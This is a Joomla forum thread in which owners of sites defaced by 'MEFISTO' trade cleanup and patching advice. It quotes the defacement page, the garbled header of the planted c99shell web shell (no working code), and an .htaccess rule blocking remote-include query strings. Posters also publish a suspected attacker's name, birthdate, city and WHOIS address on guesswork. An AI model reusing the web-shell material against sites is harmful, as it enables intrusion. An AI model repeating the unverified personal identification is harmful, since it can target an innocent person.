Hacked by MEFISTO
Moderator: General Support Moderators
Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
- jproducer
- Joomla! Intern
- Posts: 67
- Joined: Mon Sep 26, 2005 4:37 am
- Location: Denver
- Contact:
Hacked by MEFISTO
Well, looks like I stepped away from my site for about a month and got hacked. I guess I'm posting because I'm hoping if someone looks at the page they can see the errors and maybe give a little hand.
I can't give much info, but can investigate. I had joomla 1.0.9 and had several components. I am not a master joomla user like some of the other threads I read about this. I'm just posting hoping it might get some questions that I can try and investigate and answer.
Here's my site, just happened in the last couple of days. I haven't checked in about a week.
http://www.prettymess.net/main/
Man, I really put a lot of work into this site and it was just about my recording studio. I guess I was naive to believe that I was not going to be targeted by someone with too much time on their hands. My mistake.
(I'm sure you can probably sense the defeat in my post, this really bums me out)
I can't give much info, but can investigate. I had joomla 1.0.9 and had several components. I am not a master joomla user like some of the other threads I read about this. I'm just posting hoping it might get some questions that I can try and investigate and answer.
Here's my site, just happened in the last couple of days. I haven't checked in about a week.
http://www.prettymess.net/main/
Man, I really put a lot of work into this site and it was just about my recording studio. I guess I was naive to believe that I was not going to be targeted by someone with too much time on their hands. My mistake.
(I'm sure you can probably sense the defeat in my post, this really bums me out)
If you heard that...you should be the engineer!
http://www.prettymess.net
http://www.prettymess.net
- infograf768
- Joomla! Master
- Posts: 19133
- Joined: Fri Aug 12, 2005 3:47 pm
- Location: **Translation Matters**
Re: Hacked by MEFISTO
1. Please list all 3pd add-ons used on your site.
2. Look at the logs and search for the string "mosconfig", you will cerainly pinpoint there the target of the hacker.
Normally, your database should be safe. It will therefore be just a matter of reinstalling Joomla (1.0.10 this time) and the right add-ons (updated to the new non-vulnerable versions obviously).
2. Look at the logs and search for the string "mosconfig", you will cerainly pinpoint there the target of the hacker.
Normally, your database should be safe. It will therefore be just a matter of reinstalling Joomla (1.0.10 this time) and the right add-ons (updated to the new non-vulnerable versions obviously).
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
- jproducer
- Joomla! Intern
- Posts: 67
- Joined: Mon Sep 26, 2005 4:37 am
- Location: Denver
- Contact:
Re: Hacked by MEFISTO
Ext Cal, Joombook, and joomlaxplorer, I believe.
I do recall a little trouble with my ext cal first.
I do recall a little trouble with my ext cal first.
If you heard that...you should be the engineer!
http://www.prettymess.net
http://www.prettymess.net
- crash777
- Joomla! Explorer
- Posts: 334
- Joined: Sat Sep 03, 2005 1:56 am
- Location: Upstate New York
Re: Hacked by MEFISTO
Not just reinstalling though.. make sure to REMOVE everything first.. or go through each directory and clean it.. I had at least a hundred malicious script files interspersed in my joomla folders AND the htaccess files were all hacked too..infograf768 wrote: 1. Please list all 3pd add-ons used on your site.
2. Look at the logs and search for the string "mosconfig", you will cerainly pinpoint there the target of the hacker.
Normally, your database should be safe. It will therefore be just a matter of reinstalling Joomla (1.0.10 this time) and the right add-ons (updated to the new non-vulnerable versions obviously).
Thanks!
Aaron
Aaron
- infograf768
- Joomla! Master
- Posts: 19133
- Joined: Fri Aug 12, 2005 3:47 pm
- Location: **Translation Matters**
Re: Hacked by MEFISTO
Right.crash777 wrote:Not just reinstalling though.. make sure to REMOVE everything first.. or go through each directory and clean it.. I had at least a hundred malicious script files interspersed in my joomla folders AND the htaccess files were all hacked too..infograf768 wrote: 1. Please list all 3pd add-ons used on your site.
2. Look at the logs and search for the string "mosconfig", you will cerainly pinpoint there the target of the hacker.
Normally, your database should be safe. It will therefore be just a matter of reinstalling Joomla (1.0.10 this time) and the right add-ons (updated to the new non-vulnerable versions obviously).
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
-
- Joomla! Hero
- Posts: 2454
- Joined: Sun Aug 28, 2005 5:03 pm
Re: Hacked by MEFISTO
I believe there is an update for extcal available (forget where I read that...)
- Elpie
- Joomla! Guru
- Posts: 903
- Joined: Wed Aug 17, 2005 11:26 pm
- Contact:
Re: Hacked by MEFISTO
That announcement about the security update for ExtCalendar and links to download are here: http://forum.joomla.org/index.php/topic ... #msg402249
@jproducer - check your files via ftp to see the dates on which they were changed. Since you have been away it should be easy to spot files that were created or modified in the period you weren't doing any work on the site. In most cases, these crackers have not touched the database - a quick check through using phpMyAdmin or whatever you use for database management will tell you if your data has been compromised. If its ok, the best thing to do would be to backup your database, backup your template folder to your PC (and check files carefully for any changes), then delete all files and do a clean install of Joomla 1.0.10. If your template is fine its then just a matter of adding that back in and importing your database.
Before adding back any extensions, check the 3PD security forum to make sure you dont install something known to be insecure.
@jproducer - check your files via ftp to see the dates on which they were changed. Since you have been away it should be easy to spot files that were created or modified in the period you weren't doing any work on the site. In most cases, these crackers have not touched the database - a quick check through using phpMyAdmin or whatever you use for database management will tell you if your data has been compromised. If its ok, the best thing to do would be to backup your database, backup your template folder to your PC (and check files carefully for any changes), then delete all files and do a clean install of Joomla 1.0.10. If your template is fine its then just a matter of adding that back in and importing your database.
Before adding back any extensions, check the 3PD security forum to make sure you dont install something known to be insecure.
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info
Open Source Research & Best Practice: http://osprojects.info
- jproducer
- Joomla! Intern
- Posts: 67
- Joined: Mon Sep 26, 2005 4:37 am
- Location: Denver
- Contact:
Re: Hacked by MEFISTO
Okay, my web provider has blocked my site and given me just ftp access. Now, they said that my mysql database wasn't wrecked. Is it possible to back up my database, install joomla fresh, then put back the database to save what I had?
I know this is a newbie question, but is it possible?
I know this is a newbie question, but is it possible?
If you heard that...you should be the engineer!
http://www.prettymess.net
http://www.prettymess.net
- brad
- Joomla! Master
- Posts: 13272
- Joined: Fri Aug 12, 2005 12:38 am
- Location: Australia
- Contact:
Re: Hacked by MEFISTO
Yip. Just remove and replace your Joomla files. You will loose any non-core components/modules etc etc though. You might want to ensure you know how to configure your configuration.php file though... once new files are in place, setup configuration.php to connect to database and you should be good to go.jproducer wrote: Okay, my web provider has blocked my site and given me just ftp access. Now, they said that my mysql database wasn't wrecked. Is it possible to back up my database, install joomla fresh, then put back the database to save what I had?
I know this is a newbie question, but is it possible?
Brad Baker
https://xyzuluhosting.com
https://xyzuluhosting.com
-
- Joomla! Fledgling
- Posts: 1
- Joined: Sat Jul 29, 2006 2:33 pm
Re: Hacked by MEFISTO
I'm another victim of this pirate called MEFISTO. My website was "defaced" using the c99shell script. The attack apparently is related to com_securityimages component.
During the minutes prior to my web site being highjacked by this [EDit by mod: watch your language. Using such terms will not help solve your problems] I found multiples requests of the form
Mod Edit: Please don't paste log files to the forums. Thank you. -RobS
To my surprise, this URL gives access to perform all kind of operations on the filesystem. MEFISTO then proceeded to overwriting the "configuration.php" with a simple HTML page.
I have now the following in my .htaccess for protection:
During the minutes prior to my web site being highjacked by this [EDit by mod: watch your language. Using such terms will not help solve your problems] I found multiples requests of the form
Mod Edit: Please don't paste log files to the forums. Thank you. -RobS
To my surprise, this URL gives access to perform all kind of operations on the filesystem. MEFISTO then proceeded to overwriting the "configuration.php" with a simple HTML page.
I have now the following in my .htaccess for protection:
which will give a HTTP 403 error on any subsequent attempt to exploit the bug. This is admitedly not a permanent solution.RewriteCond %{QUERY_STRING} .*mosConfig_absolute_path.*
RewriteRule .* - [F,L]
Last edited by infograf768 on Sun Jul 30, 2006 5:41 am, edited 1 time in total.
- Autoit
- Joomla! Intern
- Posts: 59
- Joined: Sun Apr 09, 2006 4:01 pm
- Contact:
Re: Hacked by MEFISTO
my site:
/index.php:
i find:
"/" added c99.php
"/components/com_jd-wiki/lib/tpl/default/" added .thumbs.php
in .thumbs.php:
in c99.php:
my site log in Attach:
[removed by moderator=--NEVER post vulneratble logs!]
/index.php:
Code: Select all
<html>
<head>
<meta http-equiv="Content-Language" content="tr">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>HaCKed By MEFISTO</title>
</head>
<body bgcolor="#000000" text="#808080">
<p align="center"> </p>
<p align="center"> </p>
<p align="center">
<img src="http://img301.imageshack.us/img301/6885/takeittuxlo5.jpg"
width="200" height="300"></p>
<p align="center"> </p>
<p align="center"><font size="6"> HACKED By MEFISTO </font></p>
<p align="center"><font size="5">it's Not Hack..it's ******** BabE </font></p>
<p align="center"><font size="5">[email protected]</font></p>
<p align="center"><font size="5">ThanKs All My Friends..</font></p>
<p align="center"><font size="5">HACKED</font></p>
i find:
"/" added c99.php
"/components/com_jd-wiki/lib/tpl/default/" added .thumbs.php
in .thumbs.php:
Code: Select all
<?php
/*
******************************************************************************************************
*
* c99shell.php v.1.0 pre-release build #16
* Freeware license.
* [removed].
* c99shell - r-ellcld ldl www-dld.
* u eclnl lndrn nerrn dnltt ldnct r errl nndrcel ddenr:
http://[removed].ru/releases/c99shell
*
* WEB: http://[removed].ru
* ICQ UIN #: 656555
*
* nlnnc:
* + ddrlcl eruec c rluec (ftp, samba) rrec/drderec, ndncder
* rercrcl nercrcl r c drde
* (ddldcnl dreurlnn?/drndreurlnn? ldl tar)
* ddcnu dcne (ecl ndc r)
* modify-time c access-time r l el?tnn? ddc dlrencdrcc (? ne. ne $filestealth)
* + udlcl ddca PHP-er
* + ecduce ruo ldl md5, unix-md5, sha1, crc32, base64
* + unndu eru rrc ldrnnnc N
* + unndl ftp-nercdrcl r n?ec login;login c /etc/passwd (u rln nnd e 1/100 reern)
* dnndrcu u, ndncder, adddul dldrcc r /nrcrec, ddrlcl ddlnnrec SQL)
* + nedcdn "tcn" include: rnernclnec culn dldlelul n lnedcdndrec c nnr?ln co nnuec (dcr)
nrecl ec celcn $surl (rr? nnuer) ere ldl ecadrct (ddccnl) nre c ldl cookie "c99sh_surl",
cln rn-rdcn rlc? $set_surl cookie "set_surl"
* + ecnn "rccn" /bin/bash r ddlllu ddn n ddcue drdle,
* cc nlrn back connect (ddccnn? nlnncdrcl nlllc?, c u?nn? drdrelndu ? rdner NetCat).
* + ecnn unnda nre-rlc? nedcdnr
* + rnernccdrr? nddrer nulc ldrnero c dclrc?o rnd (ldl mail())
.
.
.
.
Code: Select all
* c99shell.php v.1.0 beta
[removed by moderator=--NEVER post vulneratble logs!]
Last edited by nathandiehl on Mon Aug 07, 2006 6:08 pm, edited 1 time in total.
### Joomla! AutoIt! ###
Joomla! 中文交流平台 [Chinese GMT +8] http://www.autoit.cn
Joomla! 中文交流平台 [Chinese GMT +8] http://www.autoit.cn
-
- Joomla! Guru
- Posts: 842
- Joined: Sat Sep 10, 2005 10:31 pm
Re: Hacked by MEFISTO
jd-wiki has been updated:
http://forge.joomla.org/sf/frs/do/viewR ... components
joomla_com_jd-wiki_v1.0.3:
http://forge.joomla.org/sf/frs/do/downl ... s6415?dl=1
You only need to update the template files though:
http://forum.joomla.org/index.php?topic=83724.new#new
http://forge.joomla.org/sf/frs/do/viewR ... components
joomla_com_jd-wiki_v1.0.3:
http://forge.joomla.org/sf/frs/do/downl ... s6415?dl=1
You only need to update the template files though:
http://forum.joomla.org/index.php?topic=83724.new#new
We may not be able to control the wind, but we can always adjust our sails
- Predator
- Joomla! Ace
- Posts: 1823
- Joined: Wed Aug 17, 2005 10:12 pm
- Location: Germany-Bad Abbach
- Contact:
Re: Hacked by MEFISTO
There is no need to install the new version completly only unzip and replace the templates default and nucleus in /componets/com_jd-wiki/lib/tpl thats it if you only want to update.
If you have Register Global Off you are secure but to be sure also update the templates, the Remote Include Vulnerablility works only with RG = On.
If you have Register Global Off you are secure but to be sure also update the templates, the Remote Include Vulnerablility works only with RG = On.
Last edited by Predator on Mon Aug 07, 2006 7:24 pm, edited 1 time in total.
The "Humor, Fun and Games" forum has more than 2500 Posts, so why not build a "Humor, Fun and Games Working" Group?
.....
Malicious tongues say we have this WG right from the start, they call it core team
.....
Malicious tongues say we have this WG right from the start, they call it core team
- Autoit
- Joomla! Intern
- Posts: 59
- Joined: Sun Apr 09, 2006 4:01 pm
- Contact:
Re: Hacked by MEFISTO
thank all!
### Joomla! AutoIt! ###
Joomla! 中文交流平台 [Chinese GMT +8] http://www.autoit.cn
Joomla! 中文交流平台 [Chinese GMT +8] http://www.autoit.cn
- batje
- Joomla! Fledgling
- Posts: 4
- Joined: Sun Sep 04, 2005 7:43 am
- Location: Kampala, Uganda
- Contact:
Re: Hacked by MEFISTO
Just a bit of googling:
[email protected] brings you a lot of sites that have been hacked by this ingenious fellow. But no info. Although there is a lot of Turkish around these pages, somehow...
Doing a search for mefistofales brings up more interesting stuff, amonst wich 3 profiles, one in chech, one in romania and this one, in turkish:
http://www.blogcu.com/mefistofales
how many people would use this nickname and speak turkish?
There is an email address: [email protected] And a profile page:
http://www.blogcu.com/mefistofales/profile/
with this info:
Blog: ve ve ve
her şeyi bulabileceğiniz bir yer olma umuduyla
• Ad Soyad: selcuk yardimciel
• Cinsiyet: Erkek
• Doğum Tarihi: Kasım 12, 1983 (Yaş: 22)
• Yer: ankara, Turkiye
• Blog Kategorisi: Diğer
Yazdığım Yazılar: 0 kayıt
Yazdığım Yorumlar: 0 yorum
Alınan Yorumlar: 0 yorum
Kayıt Tarihi: 10 Mayıs 2006
Son Giriş: 19 Mayıs 2006
Is there anyone who reads turkish? For example, what does Diger stand for?
The attack on my server, was performed using a script hosted under a yahoo account called sikat_pl. You can see the code here: http://geocities.com/sikat_pl/nenen.txt
Sikat btw seems to be a philipino word if you google for it.
The IP adress from where the attack was staged was 125.160.81.175. I cant trace that address, even with http://www.ripe.net, my ISP does not allow me to do traceroutes either.
The second hacker btw was [email protected], and he also seems to master the turkish language. I think he just started, because google does not reveal a lot of information about this fellow.
Do other people have similar logs?
BTW, this post blocked the attack: http://forum.joomla.org/index.php/topic,75376.0.html
I just went into the backend of my website. I have a statistics component running. and guess what? It shows the last visitor! And guess what? He is from Turkey! And guess what? He has an ADSL modem. It's happily located at
dsl.static8510111679.ttnet.net.tr
If you were also hacked by this Mefisto guy, you can send an email to his provider at [email protected], asking for the guys name and address so that you can file a lawsuit against him. Given the fact that he seems to be relatively active, and Turkey really wants to show it is ready to join the EU, is expect they will answer positively to this request.
[email protected] brings you a lot of sites that have been hacked by this ingenious fellow. But no info. Although there is a lot of Turkish around these pages, somehow...
Doing a search for mefistofales brings up more interesting stuff, amonst wich 3 profiles, one in chech, one in romania and this one, in turkish:
http://www.blogcu.com/mefistofales
how many people would use this nickname and speak turkish?
There is an email address: [email protected] And a profile page:
http://www.blogcu.com/mefistofales/profile/
with this info:
Blog: ve ve ve
her şeyi bulabileceğiniz bir yer olma umuduyla
• Ad Soyad: selcuk yardimciel
• Cinsiyet: Erkek
• Doğum Tarihi: Kasım 12, 1983 (Yaş: 22)
• Yer: ankara, Turkiye
• Blog Kategorisi: Diğer
Yazdığım Yazılar: 0 kayıt
Yazdığım Yorumlar: 0 yorum
Alınan Yorumlar: 0 yorum
Kayıt Tarihi: 10 Mayıs 2006
Son Giriş: 19 Mayıs 2006
Is there anyone who reads turkish? For example, what does Diger stand for?
The attack on my server, was performed using a script hosted under a yahoo account called sikat_pl. You can see the code here: http://geocities.com/sikat_pl/nenen.txt
Sikat btw seems to be a philipino word if you google for it.
The IP adress from where the attack was staged was 125.160.81.175. I cant trace that address, even with http://www.ripe.net, my ISP does not allow me to do traceroutes either.
The second hacker btw was [email protected], and he also seems to master the turkish language. I think he just started, because google does not reveal a lot of information about this fellow.
Do other people have similar logs?
BTW, this post blocked the attack: http://forum.joomla.org/index.php/topic,75376.0.html
I just went into the backend of my website. I have a statistics component running. and guess what? It shows the last visitor! And guess what? He is from Turkey! And guess what? He has an ADSL modem. It's happily located at
dsl.static8510111679.ttnet.net.tr
If you were also hacked by this Mefisto guy, you can send an email to his provider at [email protected], asking for the guys name and address so that you can file a lawsuit against him. Given the fact that he seems to be relatively active, and Turkey really wants to show it is ready to join the EU, is expect they will answer positively to this request.
Last edited by batje on Mon Aug 14, 2006 3:03 pm, edited 1 time in total.
OpenSource from Africa
http://www.mountbatten.net
http://www.mountbatten.net
- chilifrei64
- Joomla! Apprentice
- Posts: 31
- Joined: Thu Feb 16, 2006 9:40 pm
- Location: Detroit, MI
Re: Hacked by MEFISTO
Yeah, there has to be some sort of security hole in joomla. I am on the latest 1.0.10 and 3 of my sites were hit.
Only the index.php was rewritten on each site(atleast all I could find)
Might be something to look into. I have not been able to find any c99.php script.. Only components are
joomlaxplorer(latest version)
my comment(this was installed the day it was hacked(latest version)
community builder(updated a week ago after the new security release)
Hope this helps you figure it out.
Only the index.php was rewritten on each site(atleast all I could find)
Might be something to look into. I have not been able to find any c99.php script.. Only components are
joomlaxplorer(latest version)
my comment(this was installed the day it was hacked(latest version)
community builder(updated a week ago after the new security release)
Hope this helps you figure it out.
-
- Joomla! Fledgling
- Posts: 1
- Joined: Mon Sep 10, 2007 2:11 pm
Re: Hacked by MEFISTO
Whoever this Mefisto is, he's nothing but a low-life hacker wannabe, any real hacker with any shred of dignity wouldn't stoop to something as low as trashing your website..
Find your dryer parts the easy way...
-
- Joomla! Apprentice
- Posts: 43
- Joined: Thu Nov 23, 2006 7:52 pm
Re: Hacked by MEFISTO
There are the details of this hackers website: http://WWW.ROOTHACKER.ORG and
His e-mail is: [email protected]
Domain ID: D122651965-LROR
Domain Name: ROOTHACKER.ORG
Created On: 18-May-2006 21:19:50 UTC
Last Updated On: 21-Aug-2007 21:57:20 UTC
Expiration Date: 18-May-2008 21:19:50 UTC
Sponsoring Registrar: Directi Internet Solutions d/b/a PublicDomainRegistry.Com
(R27-LROR)
Status:OK
Registrant ID: DI_4725324
Registrant Name: Neo Anderson
Registrant Organization: A.S
Registrant Street1: Kadikoy iskele caddesi no:12
Registrant Street2:
Registrant Street3:
Registrant City: kadikoy
Registrant State/Province: Istanbul
Registrant Postal Code: 06000
Registrant Country: TR
Registrant Phone: +212.5555555
The same info for Admin and Technical contact.
His name is probably false [ref: Matrix] , but you never know. The address seems a legit personal home address.
The IP for these nameservers is: 80.93.221.97
The name servers are:
ROOT.ROOTHACKER.ORG
DAMAR.ROOTHACKER.ORG
Address DN Type Value
97.221.93.80.in-addr.arpa name host-80-93-221-97.teklan.com.tr
He has had 22 unique nameserver changes for this domain within the last year.
Other domian associations: hackturkiye.net as well as hackyurkiya.com
As his website contains illegal material, his illegal activity is atrributable with a Google search and he seems to be hosting the site at home I'd complain to Domain Name Regsitrar of .org domains and complain to the registering agent: Directi Internet Solutions, who are based in the USA, requesting deletion of the domain name.
His e-mail is: [email protected]
Domain ID: D122651965-LROR
Domain Name: ROOTHACKER.ORG
Created On: 18-May-2006 21:19:50 UTC
Last Updated On: 21-Aug-2007 21:57:20 UTC
Expiration Date: 18-May-2008 21:19:50 UTC
Sponsoring Registrar: Directi Internet Solutions d/b/a PublicDomainRegistry.Com
(R27-LROR)
Status:OK
Registrant ID: DI_4725324
Registrant Name: Neo Anderson
Registrant Organization: A.S
Registrant Street1: Kadikoy iskele caddesi no:12
Registrant Street2:
Registrant Street3:
Registrant City: kadikoy
Registrant State/Province: Istanbul
Registrant Postal Code: 06000
Registrant Country: TR
Registrant Phone: +212.5555555
The same info for Admin and Technical contact.
His name is probably false [ref: Matrix] , but you never know. The address seems a legit personal home address.
The IP for these nameservers is: 80.93.221.97
The name servers are:
ROOT.ROOTHACKER.ORG
DAMAR.ROOTHACKER.ORG
Address DN Type Value
97.221.93.80.in-addr.arpa name host-80-93-221-97.teklan.com.tr
He has had 22 unique nameserver changes for this domain within the last year.
Other domian associations: hackturkiye.net as well as hackyurkiya.com
As his website contains illegal material, his illegal activity is atrributable with a Google search and he seems to be hosting the site at home I'd complain to Domain Name Regsitrar of .org domains and complain to the registering agent: Directi Internet Solutions, who are based in the USA, requesting deletion of the domain name.
Last edited by Nibblers on Mon Sep 10, 2007 3:54 pm, edited 1 time in total.
-
- Joomla! Apprentice
- Posts: 43
- Joined: Thu Nov 23, 2006 7:52 pm
Re: Hacked by MEFISTO
Some news - this person was behind the organisation many joomla hackers came from including MEFISTO...
http://thebellwetherdaily.[URL banned].com/ ... acker.html
Sunday, March 02, 2008
FBI Probing Ohio-based Computer Hacker: European Webhost Targeted From Cincinnati Surburb?
CINCINNATI (TDB) -- The FBI's computer crimes squad is on the trail of an Ohio hacker suspected of defacing Internet sites that use a company in Finland, Scene Group Oy, as their webhost. One of the targeted 'net sites reportedly was BahiaNetStore.com, which markets Brazilian-themed women's apparel. A federal magistrate authorized a search warrant last week for a Butler County home near Cincinnati where the hacker may have operated under the online screen name, or hacker tag, "Evilthoutz." No charges have been filed.
Scene Group is a private firm based in Pori, a city of more than 100,000 residents that is the 10th largest in Finland. A company official, Mikko Kivinen, is identified in a federal court affidavit obtained by The Daily Bellwether as first reporting the hacking incidents last November 28. Kivinen later traced the suspected hacker to an online bulletin board and a page on MySpace. Kivinen told the FBI his company was a target:
"Kivinen also stated that Evilthoutz was successful in hacking into the company's server and forwarding several e-mails to the e-mail address *****. During the hack, Evilthoutz tried to change the root password of the server and was unsuccessful. Evilthoutz then called the company hosting the servers, located in Texas, in an attempt to socially engineer the root password. Again, Evilthoutz was unsuccessful in changing the root password. Kivinen noted that the last website defacement occurred on December 27, 2007. Kivinen had no idea why Evilthoutz targeted his company."
The FBI said a confidential informant has contacted the suspected hacker online and discussed website defacements. Other records about Evilthoutz were subpoenaed from Microsoft and Cincinnati Bell, which operates a highspeed Internet service called Zoomtown.
http://thebellwetherdaily.[URL banned].com/ ... acker.html
Sunday, March 02, 2008
FBI Probing Ohio-based Computer Hacker: European Webhost Targeted From Cincinnati Surburb?
CINCINNATI (TDB) -- The FBI's computer crimes squad is on the trail of an Ohio hacker suspected of defacing Internet sites that use a company in Finland, Scene Group Oy, as their webhost. One of the targeted 'net sites reportedly was BahiaNetStore.com, which markets Brazilian-themed women's apparel. A federal magistrate authorized a search warrant last week for a Butler County home near Cincinnati where the hacker may have operated under the online screen name, or hacker tag, "Evilthoutz." No charges have been filed.
Scene Group is a private firm based in Pori, a city of more than 100,000 residents that is the 10th largest in Finland. A company official, Mikko Kivinen, is identified in a federal court affidavit obtained by The Daily Bellwether as first reporting the hacking incidents last November 28. Kivinen later traced the suspected hacker to an online bulletin board and a page on MySpace. Kivinen told the FBI his company was a target:
"Kivinen also stated that Evilthoutz was successful in hacking into the company's server and forwarding several e-mails to the e-mail address *****. During the hack, Evilthoutz tried to change the root password of the server and was unsuccessful. Evilthoutz then called the company hosting the servers, located in Texas, in an attempt to socially engineer the root password. Again, Evilthoutz was unsuccessful in changing the root password. Kivinen noted that the last website defacement occurred on December 27, 2007. Kivinen had no idea why Evilthoutz targeted his company."
The FBI said a confidential informant has contacted the suspected hacker online and discussed website defacements. Other records about Evilthoutz were subpoenaed from Microsoft and Cincinnati Bell, which operates a highspeed Internet service called Zoomtown.